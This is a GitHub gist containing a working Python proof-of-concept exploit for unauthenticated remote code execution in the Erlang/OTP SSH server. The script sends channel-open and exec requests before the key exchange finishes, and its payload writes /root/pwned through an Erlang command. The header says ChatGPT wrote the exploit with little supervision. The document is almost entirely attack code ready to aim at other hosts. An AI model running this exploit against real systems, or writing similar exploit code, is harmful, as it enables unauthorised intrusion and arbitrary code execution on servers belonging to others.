Skip to content

Instantly share code, notes, and snippets.

@gdbinit
Created April 17, 2025 20:44
Show Gist options
  • Select an option

  • Save gdbinit/e08e95ce77e031cd223c537ef67ed638 to your computer and use it in GitHub Desktop.

Select an option

Save gdbinit/e08e95ce77e031cd223c537ef67ed638 to your computer and use it in GitHub Desktop.
Erlang/OTP SSH Exploit PoC
#
# Erlang/OTP SSH Exploit
#
# Written by ChatGPT with minimal supervision starting from the test case
# Tested against Erlang/OTP 26.2.5.6
#
# Have fun,
# fG!
#
import socket
import os
import struct
import time
SSH_PORT = 2222
SSH_SERVER = '127.0.0.1'
def build_ssh_string(s):
return struct.pack('>I', len(s)) + s.encode()
def random_bytes(n):
return os.urandom(n)
def build_kexinit_packet():
msg_type = b'\x14' # SSH_MSG_KEXINIT
cookie = random_bytes(16)
kex_algorithms = build_ssh_string('curve25519-sha256,[email protected],ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group16-sha512,diffie-hellman-group18-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c')
server_host_key_algorithms = build_ssh_string('[email protected],[email protected],[email protected],ecdsa-sha2-nistp256,ecdsa-sha2-nistp384,ecdsa-sha2-nistp521,[email protected],[email protected],[email protected],[email protected],ssh-ed25519,rsa-sha2-512,rsa-sha2-256,ssh-rsa')
encryption_algorithms = build_ssh_string('[email protected],aes128-ctr,aes192-ctr,aes256-ctr,[email protected],[email protected]')
mac_algorithms = build_ssh_string('[email protected],[email protected],[email protected],[email protected],[email protected],[email protected],[email protected],hmac-sha2-256,hmac-sha2-512,hmac-sha1')
compression_algorithms = build_ssh_string('none,[email protected],zlib')
parts = [
kex_algorithms,
server_host_key_algorithms,
encryption_algorithms,
encryption_algorithms,
mac_algorithms,
mac_algorithms,
compression_algorithms,
compression_algorithms,
build_ssh_string(''), # languages_client_to_server
build_ssh_string('') # languages_server_to_client
]
first_kex_packet_follows = b'\x00'
reserved = b'\x00\x00\x00\x00'
payload = msg_type + cookie + b''.join(parts) + first_kex_packet_follows + reserved
return wrap_packet(payload)
def wrap_packet(payload):
block_size = 8
padding_length = block_size - ((len(payload) + 5) % block_size)
if padding_length < 4:
padding_length += block_size
padding = os.urandom(padding_length)
packet_length = len(payload) + padding_length + 1
packet = struct.pack('>I', packet_length) + bytes([padding_length]) + payload + padding
return packet
def build_channel_open():
msg_type = b'\x5a'
channel_type = build_ssh_string('session')
sender_channel = struct.pack('>I', 0)
initial_window_size = struct.pack('>I', 0x68000)
max_packet_size = struct.pack('>I', 0x10000)
payload = msg_type + channel_type + sender_channel + initial_window_size + max_packet_size
return wrap_packet(payload)
def build_channel_request():
msg_type = b'\x62'
recipient_channel = struct.pack('>I', 0)
request_type = build_ssh_string('exec')
want_reply = b'\x01'
# the command we want to send
command = build_ssh_string('file:write_file("/root/pwned", "hello!").')
payload = msg_type + recipient_channel + request_type + want_reply + command
return wrap_packet(payload)
def recv_packet(sock):
hdr = sock.recv(5)
if len(hdr) < 5:
raise ValueError("Incomplete SSH packet header received")
packet_length = struct.unpack('>I', hdr[:4])[0]
padding_length = hdr[4]
body = sock.recv(packet_length - 1)
payload = body[:packet_length - padding_length - 1]
msg_type = payload[0]
return msg_type, payload
def main():
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect((SSH_SERVER, SSH_PORT))
# Step 1: Receive banner
banner = s.recv(256)
print(f"[+] Server banner: {banner.decode().strip()}")
# Step 2: Send client banner
client_banner = b'SSH-2.0-EarlyRCE_KEXINIT_Test\r\n'
s.sendall(client_banner)
print("[+] Sent client banner")
time.sleep(0.5)
# Step 3: Send KEXINIT
kexinit_packet = build_kexinit_packet()
s.sendall(kexinit_packet)
print("[+] Sent valid SSH_MSG_KEXINIT")
# Step 4: Receive server response
try:
msg_type, payload = recv_packet(s)
print(f"[+] Received server message type: {msg_type:#04x}")
if msg_type == 0x14:
print("[*] Server responded with SSH_MSG_KEXINIT (as expected).")
print(payload)
else:
print(f"[*] Server responded with unexpected message: type {msg_type}")
except Exception as e:
print(f"[-] Error reading server response: {e}")
# 4. Send CHANNEL_OPEN early
s.sendall(build_channel_open())
print("[+] Sent SSH_MSG_CHANNEL_OPEN (early)")
time.sleep(0.5)
# 5. Send CHANNEL_REQUEST early
s.sendall(build_channel_request())
print("[+] Sent SSH_MSG_CHANNEL_REQUEST (early)")
# 6. Receive server's reaction
try:
response = s.recv(1024)
print("[+] Server response:", response)
except Exception as e:
print("[-] Error receiving response:", e)
s.close()
if __name__ == '__main__':
main()
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment